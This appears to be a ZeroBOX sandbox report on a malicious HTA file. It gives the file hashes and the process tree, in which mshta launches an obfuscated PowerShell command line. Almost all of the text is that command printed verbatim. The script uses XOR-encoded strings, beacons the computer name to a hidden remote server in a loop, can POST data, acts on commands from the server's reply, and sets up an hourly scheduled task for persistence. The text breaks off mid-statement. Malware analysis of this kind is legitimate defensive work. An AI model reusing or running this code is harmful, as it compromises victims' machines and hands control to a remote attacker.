Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 13, 2023, 9:53 a.m.	June 13, 2023, 9:55 a.m.

Size	21.9KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`00cf40deab29bc4bdf812434e171c14c`
SHA256	`ed086fc8358d38538e46f5753942f217e7600cac4832bc4643d68b2a3cc98f64`
CRC32	`EB0BDE88`
ssdeep	`384:g4Zx5F1EDVEOW2jZVsrI8HPo2HXO6jnCMK9HXD01ZTA9nbce:55XkEOWM47Po23Rj503Q1ZTA9nbce`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\smartoption.php.html.hta
3032
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ElksyKqgq = 'NzXwsdKH4mhsJlZ';$dS1me690PeF01 = 'yPY0RHrDa5fVEbN';$dS1me690PeF01 = [System.Text.Encoding]::UTF8.GetBytes($dS1me690PeF01);$dS1me690PeF01[0] = 33312 -bxor 33350;$dS1me690PeF01[1] = 5894 -bxor 5980;$dS1me690PeF01[2] = 53821 -bxor 53844;$dS1me690PeF01[3] = 24611 -bxor 24676;$dS1me690PeF01[4] = 2604 -bxor 2585;$dS1me690PeF01[5] = 43144 -bxor 43234;$dS1me690PeF01[6] = 41855 -bxor 41806;$dS1me690PeF01[7] = 41245 -bxor 41330;$dS1me690PeF01[8] = 43527 -bxor 43583;$dS1me690PeF01[9] = 53707 -bxor 53667;$dS1me690PeF01[10] = 61928 -bxor 61853;$dS1me690PeF01[11] = 4996 -bxor 5066;$dS1me690PeF01[12] = 27428 -bxor 27470;$dS1me690PeF01[13] = 54354 -bxor 54282;$dS1me690PeF01[14] = 35537 -bxor 35463;$ElksyKqgq = [System.Text.Encoding]::UTF8.GetString($dS1me690PeF01);$qPaINTp8mf0 = $ElksyKqgq;function whKgZ($yTCpQOfKack, $xYlVKzM){$rCjLJasyf0m7 = [System.Text.Encoding]::UTF8;$CRABmSSX_ = $rCjLJasyf0m7.GetBytes($yTCpQOfKack);$LyZoc7Ykbs = $rCjLJasyf0m7.GetBytes($xYlVKzM);for ($i=0; $i -lt $LyZoc7Ykbs.length;){for ($j =0; $j -lt $CRABmSSX_.length; $j++){$LyZoc7Ykbs[$i] = $LyZoc7Ykbs[$i] -bxor $CRABmSSX_[$j];$i++;if ($i -ge $LyZoc7Ykbs.length){$j = $CRABmSSX_.length;}}}$ySwqdHx8Dh = [System.Convert]::ToBase64String($LyZoc7Ykbs);$ySwqdHx8Dh = $ySwqdHx8Dh.replace('+', '-').replace('/', '_').replace('=', '');return $ySwqdHx8Dh;}function mdkinhmi0xs63xl($Ube5aXEYlM7){return (-join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count $Ube5aXEYlM7 | % {[char]$_}));}function S54m3xeK($nmLUVYfYimhN){$BMxL1 = mdkinhmi0xs63xl(5);$RznphCP = mdkinhmi0xs63xl(7);$xwhlQbRfEg_wwKF = mdkinhmi0xs63xl(16);$V4yUZ8nNguf7 = whKgZ $xwhlQbRfEg_wwKF $nmLUVYfYimhN;$BK7qm = '';$eWPzX = Get-Random -Maximum 5;for ($i = 0; $i -lt $eWPzX; $i++){$Bz6ES = Get-Random -Maximum 10 -Minimum 1;if (($Bz6ES -eq 5) -or ($Bz6ES -eq 7)){$Bz6ES--;}$HETSfJ99FEVe0 = Get-Random -Maximum 16 -Minimum 5;$NHWxXYSzsX6ki8zD = mdkinhmi0xs63xl($Bz6ES);$TM9GFOCA7 = mdkinhmi0xs63xl($HETSfJ99FEVe0);if ($BK7qm -eq ''){$BK7qm = $BK7qm + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;} else {$BK7qm = $BK7qm + '&' + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;}}if ($BK7qm -eq ''){$BK7qm = $BK7qm + $BMxL1 + '=' + $xwhlQbRfEg_wwKF + '&' + $RznphCP + '=' + $V4yUZ8nNguf7;} else {$BK7qm = $BK7qm + '&' + $BMxL1 + '=' + $xwhlQbRfEg_wwKF + '&' + $RznphCP + '=' + $V4yUZ8nNguf7;}$QQ3mvz = Get-Random -Maximum 3;for ($i = 0; $i -lt $QQ3mvz; $i++){$Bz6ES = Get-Random -Maximum 10 -Minimum 1;if (($Bz6ES -eq 5) -or ($Bz6ES -eq 7)){$Bz6ES--;}$HETSfJ99FEVe0 = Get-Random -Maximum 12 -Minimum 1;$NHWxXYSzsX6ki8zD = mdkinhmi0xs63xl($Bz6ES);$TM9GFOCA7 = mdkinhmi0xs63xl($HETSfJ99FEVe0);if ($BK7qm -eq ''){$BK7qm = $BK7qm + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;} else {$BK7qm = $BK7qm + '&' + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;}}return '?' + $BK7qm;}$T0c4GnRZL0 = 'o8DP9rn5zE1kaF';$VqRvR7u01 = 'rbbyGdyuIHnQEO';$VqRvR7u01 = [System.Text.Encoding]::UTF8.GetBytes($VqRvR7u01);$VqRvR7u01[0] = 3928 -bxor 3898;$VqRvR7u01[1] = 11945 -bxor 11931;$VqRvR7u01[2] = 21808 -bxor 21873;$VqRvR7u01[3] = 25530 -bxor 25550;$VqRvR7u01[4] = 23678 -bxor 23601;$VqRvR7u01[5] = 48796 -bxor 48876;$VqRvR7u01[6] = 55455 -bxor 55513;$VqRvR7u01[7] = 65244 -bxor 65202;$VqRvR7u01[8] = 23263 -bxor 23189;$VqRvR7u01[9] = 38044 -bxor 38133;$VqRvR7u01[10] = 10093 -bxor 10027;$VqRvR7u01[11] = 62542 -bxor 62470;$VqRvR7u01[12] = 48053 -bxor 48124;$VqRvR7u01[13] = 45810 -bxor 45719;$T0c4GnRZL0 = [System.Text.Encoding]::UTF8.GetString($VqRvR7u01);$ANNaEKn24PF = $T0c4GnRZL0;function SWWZUOAn($yPvXZCD3UDvC_1I7){return [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($yPvXZCD3UDvC_1I7));}function LiYMh74($yPvXZCD3UDvC_1I7){$b64str = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($yPvXZCD3UDvC_1I7));return $b64str.replace('+', '-').replace('/', '_').replace('=', '');}function LuXhxzm2KtHSmTxS($OOa9P1cGqThqWwO3, $WnI_R){$SUZgLOy = [System.Text.Encoding]::UTF8.GetBytes($WnI_R);[System.Net.HttpWebRequest] $hcAiTwqCt9PwT = [System.Net.WebRequest]::Create($OOa9P1cGqThqWwO3);$U_NUkepb71Q = 's1lb';$AXQigUrD6uwklW01 = 'cc3g';$AXQigUrD6uwklW01 = [System.Text.Encoding]::UTF8.GetBytes($AXQigUrD6uwklW01);$AXQigUrD6uwklW01[0] = 28594 -bxor 28642;$AXQigUrD6uwklW01[1] = 7544 -bxor 7479;$AXQigUrD6uwklW01[2] = 14992 -bxor 15043;$AXQigUrD6uwklW01[3] = 65336 -bxor 65388;$U_NUkepb71Q = [System.Text.Encoding]::UTF8.GetString($AXQigUrD6uwklW01);$hcAiTwqCt9PwT.Method = $U_NUkepb71Q;$frNzen = 'x0ymi50wOBCHMa0vesHUk0hjaQq9yd1VV';$S9ybl01 = '7ZX6LiBugDgzhtuC3mTvXB60vUCC2aeFY';$S9ybl01 = [System.Text.Encoding]::UTF8.GetBytes($S9ybl01);$S9ybl01[0] = 46122 -bxor 46155;$S9ybl01[1] = 23347 -bxor 23363;$S9ybl01[2] = 58757 -bxor 58869;$S9ybl01[3] = 51395 -bxor 51375;$S9ybl01[4] = 9968 -bxor 9881;$S9ybl01[5] = 37098 -bxor 37001;$S9ybl01[6] = 55070 -bxor 55167;$S9ybl01[7] = 48095 -bxor 48043;$S9ybl01[8] = 48069 -bxor 48044;$S9ybl01[9] = 29814 -bxor 29721;$S9ybl01[10] = 49656 -bxor 49558;$S9ybl01[11] = 10102 -bxor 10073;$S9ybl01[12] = 51918 -bxor 51894;$S9ybl01[13] = 451 -bxor 494;$S9ybl01[14] = 20934 -bxor 20913;$S9ybl01[15] = 52408 -bxor 52431;$S9ybl01[16] = 40458 -bxor 40573;$S9ybl01[17] = 3704 -bxor 3669;$S9ybl01[18] = 8554 -bxor 8460;$S9ybl01[19] = 42369 -bxor 42478;$S9ybl01[20] = 2424 -bxor 2314;$S9ybl01[21] = 6571 -bxor 6598;$S9ybl01[22] = 28974 -bxor 28931;$S9ybl01[23] = 37068 -bxor 37049;$S9ybl01[24] = 9358 -bxor 9468;$S9ybl01[25] = 51114 -bxor 51142;$S9ybl01[26] = 10436 -bxor 10401;$S9ybl01[27] = 27496 -bxor 27398;$S9ybl01[28] = 20560 -bxor 20531;$S9ybl01[29] = 47641 -bxor 47734;$S9ybl01[30] = 43655 -bxor 43747;$S9ybl01[31] = 40920 -bxor 40893;$S9ybl01[32] = 7073 -bxor 7109;$frNzen = [System.Text.Encoding]::UTF8.GetString($S9ybl01);$hcAiTwqCt9PwT.ContentType = $frNzen;$hcAiTwqCt9PwT.ContentLength = $SUZgLOy.Length;try{$eLj81Oe = $hcAiTwqCt9PwT.GetRequestStream();$eLj81Oe.Write($SUZgLOy, 0, $SUZgLOy.Length);$eLj81Oe.Flush();$eLj81Oe.Close();[System.Net.HttpWebResponse] $jUYS0IdI = $hcAiTwqCt9PwT.GetResponse();$kHx3AO8E = New-Object System.IO.StreamReader($jUYS0IdI.GetResponseStream());$BK7qm = $kHx3AO8E.ReadToEnd();return $BK7qm;} catch {return '';}}function HsnmKyIW4V($wj_uC5xvtcOmXJ){$arEdmGvRqoSs = '3MAHqhnlu03NTncqN8SgQh5sFjssvVNpZzTs6GSqD4Kh2t6AH';$YGF4zEt9ImmOq8V01 = 'uv0m16W4c6b0q05fjNAIs75vvYfptNUZSy2FmYzauDl06kKtb';$YGF4zEt9ImmOq8V01 = [System.Text.Encoding]::UTF8.GetBytes($YGF4zEt9ImmOq8V01);$YGF4zEt9ImmOq8V01[0] = 441 -bxor 468;$YGF4zEt9ImmOq8V01[1] = 30585 -bxor 30474;$YGF4zEt9ImmOq8V01[2] = 36323 -bxor 36235;$YGF4zEt9ImmOq8V01[3] = 37198 -bxor 37178;$YGF4zEt9ImmOq8V01[4] = 40078 -bxor 40175;$YGF4zEt9ImmOq8V01[5] = 38586 -bxor 38554;$YGF4zEt9ImmOq8V01[6] = 60840 -bxor 60864;$YGF4zEt9ImmOq8V01[7] = 46333 -bxor 46217;$YGF4zEt9ImmOq8V01[8] = 65258 -bxor 65182;$YGF4zEt9ImmOq8V01[9] = 24688 -bxor 24576;$YGF4zEt9ImmOq8V01[10] = 28202 -bxor 28176;$YGF4zEt9ImmOq8V01[11] = 21153 -bxor 21134;$YGF4zEt9ImmOq8V01[12] = 19285 -bxor 19322;$YGF4zEt9ImmOq8V01[13] = 17638 -bxor 17558;$YGF4zEt9ImmOq8V01[14] = 23888 -bxor 23845;$YGF4zEt9ImmOq8V01[15] = 64778 -bxor 64871;$YGF4zEt9ImmOq8V01[16] = 28327 -bxor 28375;$YGF4zEt9ImmOq8V01[17] = 47484 -bxor 47377;$YGF4zEt9ImmOq8V01[18] = 36253 -bxor 36338;$YGF4zEt9ImmOq8V01[19] = 24347 -bxor 24431;$YGF4zEt9ImmOq8V01[20] = 18501 -bxor 18474;$YGF4zEt9ImmOq8V01[21] = 36431 -bxor 36413;$YGF4zEt9ImmOq8V01[22] = 58881 -bxor 58927;$YGF4zEt9ImmOq8V01[23] = 48386 -bxor 48492;$YGF4zEt9ImmOq8V01[24] = 30443 -bxor 30350;$YGF4zEt9ImmOq8V01[25] = 4839 -bxor 4755;$YGF4zEt9ImmOq8V01[26] = 49836 -bxor 49795;$YGF4zEt9ImmOq8V01[27] = 58161 -bxor 58196;$YGF4zEt9ImmOq8V01[28] = 11345 -bxor 11317;$YGF4zEt9ImmOq8V01[29] = 15971 -bxor 15882;$YGF4zEt9ImmOq8V01[30] = 14289 -bxor 14245;$YGF4zEt9ImmOq8V01[31] = 16163 -bxor 16204;$YGF4zEt9ImmOq8V01[32] = 41830 -bxor 41748;$YGF4zEt9ImmOq8V01[33] = 60433 -bxor 60478;$YGF4zEt9ImmOq8V01[34] = 49169 -bxor 49250;$YGF4zEt9ImmOq8V01[35] = 43694 -bxor 43715;$YGF4zEt9ImmOq8V01[36] = 38532 -bxor 38629;$YGF4zEt9ImmOq8V01[37] = 54818 -bxor 54864;$YGF4zEt9ImmOq8V01[38] = 10972 -bxor 10920;$YGF4zEt9ImmOq8V01[39] = 12822 -bxor 12921;$YGF4zEt9ImmOq8V01[40] = 32341 -bxor 32293;$YGF4zEt9ImmOq8V01[41] = 22378 -bxor 22302;$YGF4zEt9ImmOq8V01[42] = 29039 -bxor 28934;$YGF4zEt9ImmOq8V01[43] = 41069 -bxor 40962;$YGF4zEt9ImmOq8V01[44] = 31435 -bxor 31397;$YGF4zEt9ImmOq8V01[45] = 5356 -bxor 5314;$YGF4zEt9ImmOq8V01[46] = 53862 -bxor 53782;$YGF4zEt9ImmOq8V01[47] = 42702 -bxor 42662;$YGF4zEt9ImmOq8V01[48] = 26219 -bxor 26139;$arEdmGvRqoSs = [System.Text.Encoding]::UTF8.GetString($YGF4zEt9ImmOq8V01);$LNCKYBeJkQ = $arEdmGvRqoSs;schtasks /create /sc minute /mo 60 /tn $wj_uC5xvtcOmXJ /tr $LNCKYBeJkQ /f;}Add-Type -AssemblyName System.Web;function HpWPuNxj(){$aDqmdv69z2D = 'CcMtwBVs1FrdaHKvuAy0O7lwikCDP1blIoiPRVCAKE4JINSMu20WWTKlb';$h0Osuy3sf0um4xob01 = 'KxYDx7KGK60vfXbO9SWmMk39bDwMEsaaIDF9KmGMhFdbv83lteymEPSNS';$h0Osuy3sf0um4xob01 = [System.Text.Encoding]::UTF8.GetBytes($h0Osuy3sf0um4xob01);$h0Osuy3sf0um4xob01[0] = 40925 -bxor 40885;$h0Osuy3sf0um4xob01[1] = 25917 -bxor 25929;$h0Osuy3sf0um4xob01[2] = 10834 -bxor 10790;$h0Osuy3sf0um4xob01[3] = 25035 -bxor 25019;$h0Osuy3sf0um4xob01[4] = 55363 -bxor 55417;$h0Osuy3sf0um4xob01[5] = 63115 -bxor 63140;$h0Osuy3sf0um4xob01[6] = 44806 -bxor 44841;$h0Osuy3sf0um4xob01[7] = 61613 -bxor 61638;$h0Osuy3sf0um4xob01[8] = 1647 -bxor 1546;$h0Osuy3sf0um4xob01[9] = 8875 -bxor 8901;$h0Osuy3sf0um4xob01[10] = 32648 -bxor 32764;$h0Osuy3sf0um4xob01[11] = 20987 -bxor 20876;$h0Osuy3sf0um4xob01[12] = 21901 -bxor 21996;$h0Osuy3sf0um4xob01[13] = 50279 -bxor 50195;$h0Osuy3sf0um4xob01[14] = 9552 -bxor 9525;$h0Osuy3sf0um4xob01[15] = 9180 -bxor 9134;$h0Osuy3sf0um4xob01[16] = 32380 -bxor 32338;$h0Osuy3sf0um4xob01[17] = 9253 -bxor 9286;$h0Osuy3sf0um4xob01[18] = 51020 -bxor 50978;$h0Osuy3sf0um4xob01[19] = 40144 -bxor 40191;$h0Osuy3sf0um4xob01[20] = 14537 -bxor 14506;$h0Osuy3sf0um4xob01[21] = 43110 -bxor 43015;$h0Osuy3sf0um4xob01[22] = 12761 -bxor 12730;$h0Osuy3sf0um4xob01[23] = 23564 -bxor 23652;$h0Osuy3sf0um4xob01[24] = 42886 -bxor 42979;$h0Osuy3sf0um4xob01[25] = 28120 -bxor 28075;$h0Osuy3sf0um4xob01[26] = 945 -bxor 926;$h0Osuy3sf0um4xob01[27] = 63474 -bxor 63377;$h0Osuy3sf0um4xob01[28] = 8366 -bxor 8399;$h0Osuy3sf0um4xob01[29] = 63486 -bxor 63389;$h0Osuy3sf0um4xob01[30] = 58761 -bxor 58849;$h0Osuy3sf0um4xob01[31] = 30054 -bxor 29955;$h0Osuy3sf0um4xob01[32] = 9022 -bxor 9037;$h0Osuy3sf0um4xob01[33] = 3921 -bxor 3854;$h0Osuy3sf0um4xob01[34] = 7213 -bxor 7257;$h0Osuy3sf0um4xob01[35] = 34342 -bxor 34371;$h0Osuy3sf0um4xob01[36] = 44059 -bxor 44150;$h0Osuy3sf0um4xob01[37] = 12710 -bxor 12758;$h0Osuy3sf0um4xob01[38] = 3611 -bxor 3703;$h0Osuy3sf0um4xob01[39] = 38279 -bxor 38374;$h0Osuy3sf0um4xob01[40] = 10949 -bxor 10929;$h0Osuy3sf0um4xob01[41] = 62189 -bxor 62088;$h0Osuy3sf0um4xob01[42] = 65064 -bxor 65031;$h0Osuy3sf0um4xob01[43] = 19120 -bxor 19141;$h0Osuy3sf0um4xob01[44] = 19944 -bxor 19867;$h0Osuy3sf0um4xob01[45] = 39289 -bxor 39196;$h0Osuy3sf0um4xob01[46] = 62317 -bxor 62239;$h0Osuy3sf0um4xob01[47] = 46715 -bxor 46676;$h0Osuy3sf0um4xob01[48] = 31947 -bxor 31906;$h0Osuy3sf0um4xob01[49] = 41223 -bxor 41321;$h0Osuy3sf0um4xob01[50] = 32964 -bxor 32928;$h0Osuy3sf0um4xob01[51] = 13877 -bxor 13904;$h0Osuy3sf0um4xob01[52] = 26292 -bxor 26316;$h0Osuy3sf0um4xob01[53] = 17762 -bxor 17740;$h0Osuy3sf0um4xob01[54] = 53838 -bxor 53822;$h0Osuy3sf0um4xob01[55] = 39672 -bxor 39568;$h0Osuy3sf0um4xob01[56] = 16701 -bxor 16717;$aDqmdv69z2D = [System.Text.Encoding]::UTF8.GetString($h0Osuy3sf0um4xob01);$nh8ZPuNg4pK3aOp = $aDqmdv69z2D;$SG6M0ouk2cQUfpHV = LiYMh74($env:COMPUTERNAME);if ($SG6M0ouk2cQUfpHV -eq ''){$rbbqyvzmbQxW5vj = 'm4JO4dFbEn3j';$jDyM0BkFGCVhyt01 = 'R5m7du2ge0PV';$jDyM0BkFGCVhyt01 = [System.Text.Encoding]::UTF8.GetBytes($jDyM0BkFGCVhyt01);$jDyM0BkFGCVhyt01[0] = 42523 -bxor 42602;$jDyM0BkFGCVhyt01[1] = 14543 -bxor 14519;$jDyM0BkFGCVhyt01[2] = 50284 -bxor 50261;$jDyM0BkFGCVhyt01[3] = 48121 -bxor 48074;$jDyM0BkFGCVhyt01[4] = 25864 -bxor 25946;$jDyM0BkFGCVhyt01[5] = 64399 -bxor 64492;$jDyM0BkFGCVhyt01[6] = 41398 -bxor 41410;$jDyM0BkFGCVhyt01[7] = 63962 -bxor 63976;$jDyM0BkFGCVhyt01[8] = 40459 -bxor 40524;$jDyM0BkFGCVhyt01[9] = 39021 -bxor 38964;$jDyM0BkFGCVhyt01[10] = 29569 -bxor 29616;$jDyM0BkFGCVhyt01[11] = 12724 -bxor 12762;$rbbqyvzmbQxW5vj = [System.Text.Encoding]::UTF8.GetString($jDyM0BkFGCVhyt01);$SG6M0ouk2cQUfpHV = $rbbqyvzmbQxW5vj;}$cL4OLMozllhTOvN0 = 'mc3xH8dj1pOYCYTMFUU';$i_yupXum9o4A01 = 'n97O4RL1O9meVciqKn9';$i_yupXum9o4A01 = [System.Text.Encoding]::UTF8.GetBytes($i_yupXum9o4A01);$i_yupXum9o4A01[0] = 25703 -bxor 25661;$i_yupXum9o4A01[1] = 24729 -bxor 24745;$i_yupXum9o4A01[2] = 43535 -bxor 43579;$i_yupXum9o4A01[3] = 39771 -bxor 39697;$i_yupXum9o4A01[4] = 2522 -bxor 2493;$i_yupXum9o4A01[5] = 10517 -bxor 10604;$i_yupXum9o4A01[6] = 20530 -bxor 20490;$i_yupXum9o4A01[7] = 19045 -bxor 18997;$i_yupXum9o4A01[8] = 39629 -bxor 39594;$i_yupXum9o4A01[9] = 10440 -bxor 10392;$i_yupXum9o4A01[10] = 6161 -bxor 6183;$i_yupXum9o4A01[11] = 24150 -bxor 24069;$i_yupXum9o4A01[12] = 9906 -bxor 9856;$i_yupXum9o4A01[13] = 18939 -bxor 18850;$i_yupXum9o4A01[14] = 2491 -bxor 2521;$i_yupXum9o4A01[15] = 41121 -bxor 41103;$i_yupXum9o4A01[16] = 15101 -bxor 15001;$i_yupXum9o4A01[17] = 61464 -bxor 61561;$i_yupXum9o4A01[18] = 53213 -bxor 53161;$cL4OLMozllhTOvN0 = [System.Text.Encoding]::UTF8.GetString($i_yupXum9o4A01);$em9ZbV = $cL4OLMozllhTOvN0;$jW3dX = $env:APPDATA + '\' + $em9ZbV;$H6Rq5fB4aky27 = 'pVhWrpfLw1HlIv2e0mKk';$hdeNFbCBu6QgOZV001 = 'maHtOIXxL4H1dpTrLhaD';$hdeNFbCBu6QgOZV001 = [System.Text.Encoding]::UTF8.GetBytes($hdeNFbCBu6QgOZV001);$hdeNFbCBu6QgOZV001[0] = 14735 -bxor 14784;$hdeNFbCBu6QgOZV001[1] = 50810 -bxor 50716;$hdeNFbCBu6QgOZV001[2] = 56841 -bxor 56943;$hdeNFbCBu6QgOZV001[3] = 2786 -bxor 2699;$hdeNFbCBu6QgOZV001[4] = 36501 -bxor 36598;$hdeNFbCBu6QgOZV001[5] = 14180 -bxor 14081;$hdeNFbCBu6QgOZV001[6] = 64650 -bxor 64726;$hdeNFbCBu6QgOZV001[7] = 26751 -bxor 26640;$hdeNFbCBu6QgOZV001[8] = 64146 -bxor 64226;$hdeNFbCBu6QgOZV001[9] = 20928 -bxor 20916;$hdeNFbCBu6QgOZV001[10] = 53051 -bxor 53074;$hdeNFbCBu6QgOZV001[11] = 47608 -bxor 47511;$hdeNFbCBu6QgOZV001[12] = 22734 -bxor 22688;$hdeNFbCBu6QgOZV001[13] = 44933 -bxor 45017;$hdeNFbCBu6QgOZV001[14] = 16707 -bxor 16694;$hdeNFbCBu6QgOZV001[15] = 16066 -bxor 16050;$hdeNFbCBu6QgOZV001[16] = 19562 -bxor 19470;$hdeNFbCBu6QgOZV001[17] = 14290 -bxor 14259;$hdeNFbCBu6QgOZV001[18] = 64053 -bxor 64065;$hdeNFbCBu6QgOZV001[19] = 52106 -bxor 52207;$H6Rq5fB4aky27 = [System.Text.Encoding]::UTF8.GetString($hdeNFbCBu6QgOZV001); $fv0na8jKt8 = $H6Rq5fB4aky27;HsnmKyIW4V($fv0na8jKt8);while ($true){$kwMplBvRq2zt = '';$b2ZuuGw = 'Auc562ufGzyBeD';$U1jgVr9t01 = 'Up7wMMVScRE5Fh';$U1jgVr9t01 = [System.Text.Encoding]::UTF8.GetBytes($U1jgVr9t01);$U1jgVr9t01[0] = 62752 -bxor 62807;$U1jgVr9t01[1] = 47460 -bxor 47405;$U1jgVr9t01[2] = 26476 -bxor 26458;$U1jgVr9t01[3] = 20905 -bxor 20952;$U1jgVr9t01[4] = 12842 -bxor 12870;$U1jgVr9t01[5] = 42712 -bxor 42729;$U1jgVr9t01[6] = 31801 -bxor 31754;$U1jgVr9t01[7] = 37246 -bxor 37199;$U1jgVr9t01[8] = 35733 -bxor 35780;$U1jgVr9t01[9] = 47302 -bxor 47348;$U1jgVr9t01[10] = 23154 -bxor 23100;$U1jgVr9t01[11] = 37942 -bxor 37980;$U1jgVr9t01[12] = 32836 -bxor 32808;$U1jgVr9t01[13] = 35471 -bxor 35578;$b2ZuuGw = [System.Text.Encoding]::UTF8.GetString($U1jgVr9t01);$iuwAqApqcmXkAO = $b2ZuuGw;$pkSm2KoWGmydHl = 'gx68xiwFQubpVyqw53cUF9VUTzYtTJdJQh';$J6czkLmSPP01 = 'Amm0QsmzrP9n7LV4yXGOsTLSlTsBftEjW3';$J6czkLmSPP01 = [System.Text.Encoding]::UTF8.GetBytes($J6czkLmSPP01);$J6czkLmSPP01[0] = 15494 -bxor 15602;$J6czkLmSPP01[1] = 51078 -bxor 51199;$J6czkLmSPP01[2] = 60739 -bxor 60723;$J6czkLmSPP01[3] = 22199 -bxor 22226;$J6czkLmSPP01[4] = 62504 -bxor 62485;$J6czkLmSPP01[5] = 11129 -bxor 11034;$J6czkLmSPP01[6] = 5008 -bxor 5119;$J6czkLmSPP01[7] = 41878 -bxor 41979;$J6czkLmSPP01[8] = 8100 -bxor 8137;$J6czkLmSPP01[9] = 39566 -bxor 39663;$J6czkLmSPP01[10] = 7666 -bxor 7580;$J6czkLmSPP01[11] = 53922 -bxor 53958;$J6czkLmSPP01[12] = 48490 -bxor 48460;$J6czkLmSPP01[13] = 32205 -bxor 32169;$J6czkLmSPP01[14] = 45935 -bxor 45830;$J6czkLmSPP01[15] = 65532 -bxor 65422;$J6czkLmSPP01[16] = 52874 -bxor 52975;$J6czkLmSPP01[17] = 44326 -bxor 44357;$J6czkLmSPP01[18] = 14151 -bxor 14131;$J6czkLmSPP01[19] = 46007 -bxor 46046;$J6czkLmSPP01[20] = 58204 -bxor 58163;$J6czkLmSPP01[21] = 15091 -bxor 15005;$J6czkLmSPP01[22] = 36865 -bxor 36924;$J6czkLmSPP01[23] = 13189 -bxor 13303;$J6czkLmSPP01[24] = 24261 -bxor 24224;$J6czkLmSPP01[25] = 617 -bxor 522;$J6czkLmSPP01[26] = 1398 -bxor 1299;$J6czkLmSPP01[27] = 19254 -bxor 19295;$J6czkLmSPP01[28] = 47697 -bxor 47655;$J6czkLmSPP01[29] = 52994 -bxor 53095;$J6czkLmSPP01[30] = 14975 -bxor 14937;$J6czkLmSPP01[31] = 24397 -bxor 24356;$J6czkLmSPP01[32] = 28344 -bxor 28380;$J6czkLmSPP01[33] = 43809 -bxor 43804;$pkSm2KoWGmydHl = [System.Text.Encoding]::UTF8.GetString($J6czkLmSPP01);$HCp0q = S54m3xeK($pkSm2KoWGmydHl + $SG6M0ouk2cQUfpHV);$finalUrl = $nh8ZPuNg4pK3aOp + $HCp0q;$qr27kycI = [System.Net.WebRequest]::Create($nh8ZPuNg4pK3aOp + $HCp0q);try{$F09ffIubQJm = $qr27kycI.GetResponse();} catch {$OURFvRexTaeE23zV = Get-Random -Maximum 60;$OURFvRexTaeE23zV = $OURFvRexTaeE23zV+5;start-sleep -seconds $OURFvRexTaeE23zV;continue;}$AGDFmtT = $F09ffIubQJm.StatusCode;$CGDqIISmGvhx84xp = 'aB1L';$Z3PnDkPyrJM73T01 = 'IOk1';$Z3PnDkPyrJM73T01 = [System.Text.Encoding]::UTF8.GetBytes($Z3PnDkPyrJM73T01);$Z3PnDkPyrJM73T01[0] = 9069 -bxor 8983;$Z3PnDkPyrJM73T01[1] = 26507 -bxor 26611;$Z3PnDkPyrJM73T01[2] = 28065 -bxor 28099;$Z3PnDkPyrJM73T01[3] = 19950 -bxor 19860;$CGDqIISmGvhx84xp = [System.Text.Encoding]::UTF8.GetString($Z3PnDkPyrJM73T01);$R4db3ayUHUw6A = $CGDqIISmGvhx84xp;$sr1olbnmchzR = '3HjQh';$BmOthTTBpzx601 = 'DSc4W';$BmOthTTBpzx601 = [System.Text.Encoding]::UTF8.GetBytes($BmOthTTBpzx601);$BmOthTTBpzx601[0] = 11248 -bxor 11139;$BmOthTTBpzx601[1] = 26060 -bxor 26040;$BmOthTTBpzx601[2] = 5138 -bxor 5235;$BmOthTTBpzx601[3] = 50639 -bxor 50621;$BmOthTTBpzx601[4] = 40904 -bxor 40892;$sr1olbnmchzR = [System.Text.Encoding]::UTF8.GetString($BmOthTTBpzx601);$gha9dupC = $sr1olbnmchzR;$ud3JSBmy = '7WSFDu';$laADOozsqXRnUEKX01 = 'zdl0r0';$laADOozsqXRnUEKX01 = [System.Text.Encoding]::UTF8.GetBytes($laADOozsqXRnUEKX01);$laADOozsqXRnUEKX01[0] = 1291 -bxor 1378;$laADOozsqXRnUEKX01[1] = 18218 -bxor 18253;$laADOozsqXRnUEKX01[2] = 33393 -bxor 33311;$laADOozsqXRnUEKX01[3] = 25622 -bxor 25721;$laADOozsqXRnUEKX01[4] = 1288 -bxor 1402;$laADOozsqXRnUEKX01[5] = 4445 -bxor 4408;$ud3JSBmy = [System.Text.Encoding]::UTF8.GetString($laADOozsqXRnUEKX01);$GdD5nwImmlfb = $ud3JSBmy;If ($AGDFmtT -eq 200){$x1XuBfdP = New-Object System.IO.StreamReader $F09ffIubQJm.GetResponseStream();$xYlVKzM=$x1XuBfdP.ReadToEnd();if (!$xYlVKzM.Contains('Fail')){if ($xYlVKzM.Contains($R4db3ayUHUw6A)){$INTZ_4FIYL = $xYlVKzM.Substring(16);$aSzFooViwhHMOS = 'Qe6gShw2HEk48NuJdH08FFLNZ9SDUu';$QmtbPoE501 = 'iXit2bA102BXNLHDtLO9qEgZ18C8ml';$QmtbPoE501 = [System.Text.Encoding]::UTF8.GetBytes($QmtbPoE501);$QmtbPoE501[0] = 42900 -bxor 42976;$QmtbPoE501[1] = 1496 -bxor 1441;$QmtbPoE501[2] = 63438 -bxor 63422;$QmtbPoE501[3] = 45050 -bxor 44959;$QmtbPoE501[4] = 56917 -bxor 56936;$QmtbPoE501[5] = 522 -bxor 632;$QmtbPoE501[6] = 4611 -bxor 4710;$QmtbPoE501[7] = 16552 -bxor 16603;$QmtbPoE501[8] = 18031 -bxor 17946;$QmtbPoE501[9] = 24549 -bxor 24457;$QmtbPoE501[10] = 65415 -bxor 65523;$QmtbPoE501[11] = 53065 -bxor 53103;$QmtbPoE501[12] = 56 -bxor 92;$QmtbPoE501[13] = 3692 -bxor 3589;$QmtbPoE501[14] = 16896 -bxor 17010;$QmtbPoE501[15] = 32257 -bxor 32356;$QmtbPoE501[16] = 34225 -bxor 34258;$QmtbPoE501[17] = 23229 -bxor 23241;$QmtbPoE501[18] = 58075 -bxor 58034;$QmtbPoE501[19] = 874 -bxor 773;$QmtbPoE501[20] = 18856 -bxor 18886;$QmtbPoE501[21] = 14808 -bxor 14821;$QmtbPoE501[22] = 13100 -bxor 13151;$QmtbPoE501[23] = 32024 -bxor 